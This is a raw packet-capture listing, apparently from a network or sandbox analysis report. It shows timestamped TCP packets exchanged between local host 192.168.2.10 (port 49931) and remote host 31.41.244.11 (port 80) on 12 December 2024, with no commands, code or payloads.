                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.639889002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.639914036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.639929056 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.641293049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.641333103 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.642064095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.642901897 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.643076897 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.643095970 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.643137932 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.644609928 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.644695997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.644979954 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.645076036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.646315098 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.646456957 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.646522999 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.646564960 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.647927999 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.647953987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.647989035 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.649421930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.649456024 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.649528980 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.649573088 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.650969028 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.651010036 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.651063919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.651063919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.652518988 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.652538061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.652595043 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.653978109 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.654021978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.654176950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.654227018 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.655612946 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.655647039 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.655657053 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.655678988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.657113075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.657130957 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.657160997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.657177925 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.658472061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.658519030 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.658708096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.658747911 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.659929991 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.659985065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.660012007 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.660926104 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.661422968 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.661535978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.661545992 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.661849976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.662929058 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.662946939 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.662969112 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.662990093 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.664364100 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.664383888 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.664412022 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.664449930 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.665790081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.665805101 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.665843010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.665894032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.667218924 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.667236090 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.667280912 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.668551922 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.668569088 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.668596029 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.668612003 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.670126915 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.670140028 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.670169115 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.670186996 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.671387911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.671406031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.671446085 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.672739983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.672758102 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.672785997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.672811031 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.674096107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.674113035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.674137115 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.674149036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.675559998 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.675575972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.675600052 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.675621986 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.676733971 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.676774025 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.677743912 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.677858114 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.678200006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.678247929 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.678541899 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.678586006 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.679560900 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.679838896 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.679893017 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.680959940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.680974007 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.680996895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.681027889 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.682305098 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.682337046 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.682363987 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.682385921 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.683578014 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.683629990 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.683725119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.683772087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.685041904 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.685055017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.685091019 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.685100079 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.686353922 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.686420918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.686629057 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.686676025 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.687777042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.687800884 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.687865019 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.689100027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.689140081 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.689227104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.689292908 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.690493107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.690536976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.690562963 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.690599918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.692011118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.692027092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.692080021 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.693272114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.693288088 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.693327904 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.694721937 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.694736004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.694757938 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.694773912 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.696252108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.696265936 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.696310997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.696331978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.697633028 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.697647095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.697694063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.697694063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.698822975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.698837042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.698887110 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.700154066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.700165987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.700202942 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.701594114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.701606989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.701633930 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.701658010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.702800989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.702847004 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.703171968 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.703219891 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.704164028 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.704224110 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.705224037 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.705355883 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.705651045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.705663919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.705708981 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.707036018 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.707048893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.707081079 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.708446980 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.708462954 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.708489895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.708514929 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.709815979 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.709830046 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.709865093 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.709883928 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.711103916 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.711116076 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.711144924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.711163998 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.712549925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.712779045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.829777002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.829814911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.829886913 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.830214977 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.830220938 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.830262899 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.831166983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.831221104 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.831239939 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.831648111 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.832489967 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.832495928 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.832549095 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.833617926 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.833625078 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.833682060 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.834602118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.834609032 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.834688902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.835633039 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.835639000 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.835690022 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.836623907 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.836630106 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.836680889 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.837753057 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.837759018 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.837807894 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.838737011 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.838743925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.838814974 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.839904070 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.839910984 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.839976072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.840996027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.841001987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.841054916 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.842101097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.842107058 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.842160940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.843125105 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.843131065 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.843174934 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.844147921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.844155073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.844193935 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.845284939 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.845292091 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.845340014 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.846328020 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.846333981 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.846379042 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.847354889 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.847414970 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.847470999 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.847655058 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.848473072 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.848479033 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.848530054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.849437952 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.849503994 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.849736929 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.850203037 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.850538969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.850544930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.850584984 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.851641893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.851648092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.851690054 CET4993180192.168.2.1031.41.244.11
